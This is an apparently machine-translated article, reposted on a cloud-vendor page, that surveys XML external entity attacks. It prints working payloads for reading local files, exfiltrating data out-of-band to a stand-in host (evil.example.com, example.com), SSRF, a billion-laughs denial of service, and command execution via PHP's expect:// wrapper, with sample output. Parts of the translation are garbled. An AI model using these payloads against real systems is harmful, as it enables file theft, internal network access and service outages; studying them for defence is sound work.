Xml file security Parsing

Source: Internet
Author: User
Tags custom name

Xml file security Parsing

XML eXtensible Markup Language, designed for data transmission and storage. Its diverse forms

1. Document Format (OOXML, ODF, PDF, RSS, docx ...)

2. Image Format (SVG, EXIF Headers ,...)

3. configuration file (custom name, usually. xml)

4. network protocols (WebDAV, CalDAV, XMLRPC, SOAP, REST, XMPP, SAML, XACML ,...)

Some features designed in XML, such as XML schemas (following XML Schemas specifications) and documents type definitions (DTDs), are both sources of security issues. Even though it was publicly discussed for the last decade, a large number of software still died in XML attacks.

In fact, the XML entity mechanism is quite understandable and can be understood directly by "escaping": % and & foo are the same in the original sense, but the latter is defined by ourselves.

In DTD, the object can be declared in DTD to define variables (or macro of the text class) for use in subsequent DTD or XML documents. An object is defined in a DTD to access internal resources, obtain the text in it, and replace its own xml document. An external entity is used to access external resources (that is, these resources can be from local computers or remote hosts ). In the process of parsing external entities, the XML analyzer may use many network protocols and services (DNS, FTP, HTTP, SMB, etc.), depending on what is specified in the URLs. External entities can be used to process documents updated in real time. However, attacks can also occur when parsing external entities. Attack methods include:

Read local files (may contain sensitive information/etc/shadow)

Memory intrusion

Arbitrary Code Execution

Denial of Service

This article will summarize the long-standing xml attack methods.

0x01 first recognized XML external entity attacks. Based on the file inclusion of external entities, the earliest proposed XML attack method was to use the reference function of external entities to read arbitrary files:

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE updateProfile [  <!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> <updateProfile> <firstname>Joe</firstname> <lastname>&file;</lastname>   ...  </updateProfile> 

However, this reading method is restricted because the xml Parser requires that the referenced data be complete. We use an example to explain what is complete.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE simpleDocument [  <!ENTITY first "<my"> <!ENTITY second "tag/>"> ]> <simpleDocument>&first;&second;</simpleDocument> 

When the preceding xml document is sent to the server, an error occurs. Although it can be closed perfectly when combined, however, these entities are parsed once in line 3 and 4, and an error is thrown because they are not perfectly closed.

This type of error once made xml attacks quite messy, because in fact many files are in the "unclosed form". For example, in the PHP file recommendation method, there is only the first one. What's worse, when you choose to include a complete xml file (such as a database connection file), the returned result will be

<updateprofile>    <firstname>joe</firstname>    <lastname>        <configroot>        <various>...</various>        <configurations>...</configurations>    </configroot>    </lastname>    </updateprofile>

As you can see, when the database configuration document in the tag is embedded, most of the content is ellipsis and only the structure of the document is displayed. This is determined by the xml parser feature.

URL Invocation

 

One of the XML attacks is often ignored, that is, using the URL mechanism and some of their strange features to expand the attack surface. Although the XML specification does not require support for any specific URL mechanism, many underlying network libraries on the platform support almost all URL mechanisms. With URLs, attackers can send malicious requests to third-party hosts from hosts running XMLparser. For example, server-side request forgery (ssrf). In theory, URL Invocation can even be used to initiate flood attacks in internal networks.

Most people do not know that, even if the external entity is disabled, many xml parsers will still parse those URLs. For example, some parsers will initiate a request to the url during the document definition phase.

<? Xml version = "1.0" encoding = "UTF-8"?> <! DOCTYPE roottag PUBLIC "-// VSR // PENTEST // EN" "http: // internal/service? Ssrf "> <roottag> This is not a real attack </roottag>

In addition to external entities and SSRF attacks based on DOCTYPE, XML Schema provides two special attributes used in the instance document to indicate the location of the mode document. These two attributes are: xsi: schemaLocation and xsi: noNamespaceSchemaLocation. The former is used to declare the mode document of the target namespace, and the latter is used for the mode document without the target namespace, they are usually used in the instance documentation.

 
<roottag xmlns="http://schema/namespace/primary"          xmlns:secondaryns="http://schema/namespace/secondary"          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"          xsi:schemaLocation="http://schema/namespace/primary    <p>     <secondaryns:s>     ...      </secondaryns:s>   </p> </roottag>    http://location/of/remote/schema/primary.xsd  http://schema/namespace/secondary  http://location/of/remote/schema/secondary.xsd">

In this case, all those with the secondaryns: prefix will follow the Mechanism defined in xmlns: secondaryns. Because the DOCTYPE definition cannot appear in the middle of the document, when we only control a part of the document, we can use schema_Location (http: // location/of/remote/schema/primary. xsd) to initiate ssrf. (The premise is that some settings need to be set to on, but we have not fully tested each xml parser to study what requirements can be made for ssrf attacks in different environments, so this is also a direction to be studied. If you are interested, wooyuner can communicate with us ~)

0x02 attack methods after parameter entities are introduced

When our malicious xml is successfully parsed, we may face two problems:

1. Data is not closed, leading to embedding failure. For example, data only exists.

2. data cannot be returned due to server restrictions.

After the parameter entity is introduced, these two problems can be solved. The parameter entity starts with %. We only need to follow two principles when using the parameter entity: The parameter entity can only be used in the DTD declaration. Parameter entities cannot be referenced.

The use of CDATA escape

The CDATA part. All content in the CDATA part is ignored by the XML parser, that is, the content in the CDATA part is tight, which is a string text. A CDATA part ends with a "" mark. So can we construct a page like this to return those files?

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [    <!ENTITY % start "<![CDATA[">    <!ENTITY % goodies SYSTEM "file:///etc/fstab">    <!ENTITY % end "]]>">   <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd"> %dtd;  ]> <roottag>&all;</roottag> 

Combine. dtd:

<?xml version="1.0" encoding="UTF-8"?> <!ENTITY all "%start;%goodies;%end;"> 

As mentioned above, xml parsers will immediately explain the xml parameter entity % start % end. An error will be thrown because it is not closed, so why can % start be parsed normally? This is because the reference of the parameter object does not need to be closed during xml document parsing, so that the restriction is bypassed. In this way, we can read all the data (base64 encoding is also supported)

The out-of-band data bypass echo restricts the use of parameter entities. With the parameter entity, we can send the file to be read to our server through some protocols (such as http ftp), so we can get the data through the log view.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE roottag [  <!ENTITY % file SYSTEM "file:///c:/windows/win.ini"> <!ENTITY % dtd SYSTEM "http://example.com/evil.dtd"> %dtd;]> <roottag>&send;</roottag> 

Then in our controllable http://example.com/

Place the following DTD

<?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>"> %all; 

The process is as follows:

XXE's Qimen Jia

XInclude-based file inclusion

XInclude provides a more convenient way to retrieve data (you don't have to worry about data integrity and cause parser to throw an error). We can use the parse attribute to forcibly reference the file type.

<root xmlns:xi="http://www.w3.org/2001/XInclude">  <xi:include href="file:///etc/fstab" parse="text"/> </root> 

However, Xinclude must be manually enabled. test shows that all xml parser is disabled by default.

Denial of Service

XXE attacks can also be used to initiate Denial-of-service attacks. The following recursive references increase exponentially from bottom to bottom.

<?xml version="1.0"?> <!DOCTYPE lolz [    <!ENTITY lol "lol">   <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">   <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">   <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">   <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">   <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">   <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">   <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">   <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> 

 

Recall the parsing process. When the XML processor loads this document, it will contain the root element, which defines the object & lod9, and 19 objects are extended to include "& lol8; & lol8; & lol8; & lol8; & lol8; & lol8; & lol8; & lol8; & lol8; & lol8. In this way, the content pushed into memory increases exponentially. The experiment found that payload, a XML attack smaller than 1 kb, can consume 3 GB of memory.

Attacks and restrictions in specific environments

The XML parser in Oracle's Java Runtime Environment by default is Xerces, an apache project. Xerces and Java provide a series of features, which can lead to some serious security problems. The above attack methods (DOCTYPEs for SSRF, file reading, and parameter object OOB data) can be used freely in java's default configuration. java/Xerces also supports XInclude but requires setXIncludeAware (true) and setNamespaceAware (true ).

The java specification supports the following URL mechanism:

Httphttpsftpfilejar 

Surprisingly, the file protocol in Java can be used to list directories. For example, in linux, "file: //" lists all the items in the/directory:

Binbootdevetchome... 

Jar Protocol jar: http: // host/application. jar! /File/within/the/zip will cause the server to first obtain the file and decompress it to start with jar! And extract the following files. From the attacker's point of view, we can customize some highly compressed packages (such as 1000:1). These ZIP bombs can be used to attack the anti-virus system or consume the hard disk/memory resources of the target machine. Note that jar URLs can be used on any JAVA Xerces system that accepts the DOCTYPE definition. Therefore, even if the external entity is disabled, it can still be attacked.

Php & CT RCE

Unfortunately, this extension is not installed by default. However, the XXE vulnerability installed with this extension can execute arbitrary commands.

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]> <dir> <file>&cmd;</file> </dir>

The following is returned:

<file>uid=501(Apple) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),401(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh)<file>

Xml injection

This is not very relevant to xxe attacks, but this article discusses XML security, so this is naturally included.$GLOBALS["HTTP_RAW_POST_DATA"]In php, it is set to "do not escape". Once the program obtains data through the entity, it directly brings Mysql into the end to cause injection. XXE attacks are always ignored. Developers often say that the attack is less risky and the entity can be completely avoided when it is closed. What is XML Entity attack? However, xml Entity attacks have generated many unexpected threats to developers.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.